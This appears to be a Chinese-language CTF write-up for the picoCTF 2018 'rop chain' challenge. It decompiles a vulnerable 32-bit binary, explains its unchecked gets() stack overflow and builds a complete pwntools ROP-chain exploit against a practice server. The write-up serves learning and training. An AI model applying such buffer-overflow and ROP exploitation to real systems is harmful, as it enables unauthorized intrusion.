picoctf 2018 rop chain
# picoctf 2018 rop chain
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/picoctf_2018_rop_chain/PicoCTF_2018_rop_chain'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int main(int argc, const char **argv, const char **envp)
{
__gid_t v3; // ST1C_4
setvbuf(_bss_start, 0, 2, 0);
v3 = getegid();
setresgid(v3, v3, v3);
vuln();
return 0;
}
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
vuln函数如下
char *vuln()
{
char s; // [esp+0h] [ebp-18h]
printf("Enter your input> ");
return gets(&s);
}
1
2
3
4
5
6
7
2
3
4
5
6
7
flag函数如下
int flag(int a1)
{
char s; // [esp+Ch] [ebp-3Ch]
FILE *stream; // [esp+3Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
fgets(&s, 48, stream);
if ( win1 && win2 && a1 == -559039827 )
return printf("%s", &s);
if ( win1 && win2 )
return puts("Incorrect Argument. Remember, you can call other functions in between each win function!");
if ( win1 || win2 )
return puts("Nice Try! You're Getting There!");
return puts("You won't get the flag that easy..");
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
win_function1函数如下
void win_function1()
{
win1 = 1;
}
1
2
3
4
2
3
4
win_function2函数如下
int __cdecl win_function2(int a1)
{
int result; // eax
result = (unsigned __int8)win1;
if ( win1 && a1 == -1163220307 )
{
win2 = 1;
}
else if ( win1 )
{
result = puts("Wrong Argument. Try Again.");
}
else
{
result = puts("Nope. Try a little bit harder.");
}
return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 思路分析
- 目前信息:
vuln函数内明显的栈溢出win_function1函数可修改win1=1- 参数为
-1163220307时win_function2函数可修改win2 =1 win1 =1,win2 =1参数为-559039827时flag函数可获得flag- No canary found
- NX enabled
- No PIE
- 思路:
- 构造
rop链完成3个参数赋值,返回到flag函数获得flag
- 构造
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/picoctf_2018_rop_chain/PicoCTF_2018_rop_chain'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 27310)
elf = ELF(pwnfile)
padding = 0x18+4
win_function1_addr = elf.symbols['win_function1']
win_function2_addr = elf.symbols['win_function2']
flag_addr = elf.symbols['flag']
pop_ebx_ret = 0x0804840d
win_function1_parameter = -1163220307
win_function2_parameter = -559039827
payload = flat(['a'*padding, win_function1_addr, win_function2_addr, pop_ebx_ret,win_function1_parameter, flag_addr, 0xdeadbeef, win_function2_parameter])
io.recv()
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
上次更新: 2022/08/15, 00:29:49